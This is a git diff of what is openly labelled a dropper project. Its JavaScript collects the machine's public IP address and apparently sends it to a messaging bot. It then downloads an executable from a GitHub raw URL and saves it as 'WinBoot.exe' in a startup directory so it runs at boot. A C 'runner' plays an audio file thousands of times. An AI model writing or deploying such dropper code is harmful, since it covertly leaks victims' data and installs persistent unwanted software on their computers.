diff --git a/Hax/Dropper/src/main.js b/Hax/Dropper/src/main.js index e02993a..a0549e6 100644 --- a/Hax/Dropper/src/main.js +++ b/Hax/Dropper/src/main.js @@ -23,7 +23,7 @@ https.get("https://api.ipify.org", (ip) => { parse_mode: "HTML" } }).then(_ => { - https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/WinBoot.exe", (res) => { + https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/main.exe", (res) => { let stream = fs.createWriteStream(startdir + "/WinBoot.exe") res.pipe(stream) res.on("close", () => { diff --git a/Hax/Runner/bin/WinBoot.exe b/Hax/Runner/bin/main.exe similarity index 88% rename from Hax/Runner/bin/WinBoot.exe rename to Hax/Runner/bin/main.exe index fd45f8c..a6ab423 100644 Binary files a/Hax/Runner/bin/WinBoot.exe and b/Hax/Runner/bin/main.exe differ diff --git a/Hax/Runner/src/main.c b/Hax/Runner/src/main.c index 210f595..deb6eef 100644 --- a/Hax/Runner/src/main.c +++ b/Hax/Runner/src/main.c @@ -1,9 +1,8 @@ #include -#include #pragma comment(lib, "Winmm.lib") int main() { - while (1) PlaySound(TEXT("./etc/audio.wav"), NULL, SND_FILENAME); + for(int i = 0;i<9999;i++) PlaySound(TEXT("./etc/audio.wav"), NULL, SND_FILENAME); return 0; } \ No newline at end of file diff --git a/Hax/Runner/src/main.obj b/Hax/Runner/src/main.obj new file mode 100644 index 0000000..f297f82 Binary files /dev/null and b/Hax/Runner/src/main.obj differ